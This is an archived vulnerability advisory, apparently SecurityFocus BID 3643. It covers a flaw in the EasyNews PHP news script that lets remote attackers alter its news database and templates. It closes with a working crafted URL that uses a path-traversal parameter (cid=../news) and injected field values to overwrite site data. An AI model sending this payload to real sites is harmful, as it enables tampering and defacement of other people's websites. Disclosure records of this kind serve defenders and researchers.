13 lines
No EOL
678 B
Text
13 lines
No EOL
678 B
Text
source: http://www.securityfocus.com/bid/3643/info
|
|
|
|
EasyNews is a free, open-source script for displaying news stories on a website.
|
|
|
|
EasyNews is prone to a vulnerability which may allow a remote attacker to modify information in its Newsdatabase. As a result, a remote attacker may post unmoderated comments or possibly modify information in the templates used by EasyNews.
|
|
|
|
This may be exploited via a specially crafted web request.
|
|
|
|
Earlier versions may also be vulnerable.
|
|
|
|
http://[target]/index.php?action=comments&do=save&id=1&cid=../news&name=11/1
|
|
1/11&kommentar=%20&email=hax0r&zeit=you%20suck,11:11,../news,bugs@securityal
|
|
ert.com&datum=easynews%20exploited |